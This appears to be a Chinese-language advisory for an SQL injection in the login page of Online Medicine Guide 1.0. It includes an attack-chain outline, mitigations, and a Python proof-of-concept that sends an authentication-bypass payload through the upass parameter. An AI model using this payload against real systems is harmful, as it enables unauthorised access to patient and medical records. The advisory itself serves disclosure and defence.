CVE-2025-60736: Online Medicine Guide 1.0 login.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-60736

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Medicine Guide 1.0

漏洞概述

CVE-2025-60736是code-projects开发的一款在线医疗指南系统Online Medicine Guide 1.0中存在的严重安全漏洞。该漏洞位于登录页面(login.php)，攻击者可以通过upass参数注入恶意SQL语句，从而绕过身份验证或获取数据库中的敏感信息。由于该漏洞的CVSS评分高达9.8分，属于严重级别，且攻击复杂度低、无需认证即可利用，因此对使用该系统的医疗机构和用户构成重大威胁。攻击者可以利用此漏洞获取管理员权限，访问患者个人信息、医疗记录、药品数据等敏感数据，甚至可能通过数据库操作执行系统命令，进一步控制服务器。该漏洞影响系统的机密性、完整性和可用性，建议受影响的用户立即采取修复措施。

技术细节

该SQL注入漏洞存在于Online Medicine Guide 1.0的登录验证逻辑中。具体来说，login.php页面在处理用户登录请求时，直接将用户输入的upass参数值拼接到SQL查询语句中，而未进行充分的输入验证或参数化查询处理。攻击者可以通过在upass参数中注入SQL语句，如使用单引号(')、UNION SELECT、布尔盲注或时间盲注等技术，绕过正常的身份验证机制。例如，攻击者可以构造恶意payload来获取数据库版本信息、表结构、用户凭据等敏感数据。由于系统未对用户输入进行过滤，攻击者还可以通过SQL注入获取数据库管理员权限，进而对整个系统进行完全控制。此漏洞的利用不需要任何认证，攻击者只需构造特定的HTTP请求即可触发漏洞。

攻击链分析

STEP 1

步骤1

攻击者发现目标网站使用code-projects Online Medicine Guide 1.0，并识别出登录页面(login.php)

STEP 2

步骤2

攻击者构造恶意SQL注入payload，通过upass参数提交到login.php

STEP 3

步骤3

服务器将恶意payload拼接到SQL查询中执行，成功绕过身份验证

STEP 4

步骤4

攻击者以管理员身份登录系统，获取后台访问权限

STEP 5

步骤5

攻击者进一步利用获取的权限访问患者数据、医疗记录、药品信息等敏感数据

STEP 6

步骤6

攻击者可能通过数据库操作执行系统命令，完全控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-60736 SQL Injection PoC
# Target: code-projects Online Medicine Guide 1.0
# Vulnerability: SQL Injection in /login.php via upass parameter

def exploit_sqli(target_url):
    """
    SQL Injection exploit for CVE-2025-60736
    This PoC demonstrates authentication bypass using SQL injection
    """
    login_url = f"{target_url}/login.php"
    
    # Normal login attempt (for reference)
    normal_data = {
        'uname': 'admin',
        'upass': 'password'
    }
    
    # SQL Injection payload - bypass authentication
    # Using OR-based injection to bypass password check
    sqli_payload = {
        'uname': 'admin',
        'upass': "' OR '1'='1"
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-60736: SQL Injection in login.php")
    
    # Try SQL injection
    try:
        response = requests.post(login_url, data=sqli_payload, timeout=10)
        print(f"[+] Sent SQL injection payload: {sqli_payload['upass']}")
        print(f"[+] Response status: {response.status_code}")
        
        if 'login' not in response.text.lower() or 'failed' not in response.text.lower():
            print("[+] Authentication bypass successful!")
            print("[+] Attacker can gain unauthorized access to the system")
        else:
            print("[-] Exploitation may require payload adjustment")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-60736.py <target_url>")
        print("Example: python cve-2025-60736.py http://localhost/medicine")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sqli(target)

影响范围

code-projects Online Medicine Guide 1.0

防御指南

临时缓解措施

在正式补丁发布之前，可以采取以下临时缓解措施：1) 在Web应用防火墙中配置SQL注入检测规则，拦截恶意请求；2) 临时禁用login.php页面的访问，通过IP白名单限制管理后台访问；3) 对upass参数添加严格的输入验证逻辑，过滤单引号、分号等SQL特殊字符；4) 监控数据库查询日志，及时发现异常SQL操作；5) 考虑使用第三方身份认证服务替代原生登录功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60736
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60736
3 Details https://www.cvedetails.com/cve/CVE-2025-60736/
4 VulDB https://vuldb.com/cve/CVE-2025-60736
5 Link https://github.com/WinDyAlphA/CVE-2025-60736